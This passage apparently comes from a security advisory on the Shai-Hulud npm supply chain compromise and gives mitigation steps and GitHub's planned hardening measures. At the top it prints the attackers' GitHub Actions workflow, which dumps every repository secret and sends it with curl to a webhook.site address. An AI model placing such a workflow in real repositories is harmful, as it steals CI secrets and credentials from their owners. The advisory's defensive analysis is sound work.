jobs:
  process:
    runs-on: ubuntu-latest
    steps:
    - name: Data Processing
      run: curl -d "$CONTENTS" https://webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7; echo "$CONTENTS" | base64 -w 0 | base64 -w 0
      env:
        CONTENTS: ${{ toJSON(secrets) }}

Mitigation Recommendations

Responding to a supply chain compromise is always a challenging task, as pinpointing where packages are used or their versions may not always be easily verifiable. Nevertheless, a dependency review should be conducted for software that leverages npm. The yarn.lock or package-lock.json files may provide details about the packages in use. 

When responding to npm supply chain compromises, once compromised packages have been identified and removed, it is recommended to clear the npm cache before reinstalling the package. In addition to reinstalling packages, consider resetting secrets and user credentials that may have been exposed.  

GitHub’s Response

As of September 22, 2025, GitHub outlined a plan for securing the npm supply chain in response to these attacks. Included within this plan are the following actions:

• MFA required for local publishing
  • Time-based OTPs will be deprecated
  • Users will be moved to FIDO-based MFA
  • Users will no longer be able to bypass MFA for local publishing
• Granular Token lifetime is limited to seven days
  • Legacy tokens will be deprecated
• Trusted Publishing
  • Reduces the need for long-term tokens or credentials to be shared with external sources when authenticating to package repositories
  • Allows a package repository to authenticate an identity from an Identity Provider using OpenID Connect (OIDC)
    • Requires a pre-configured trust policy

Compromise Packages

1st Compromise

Shai-Hulud Compromise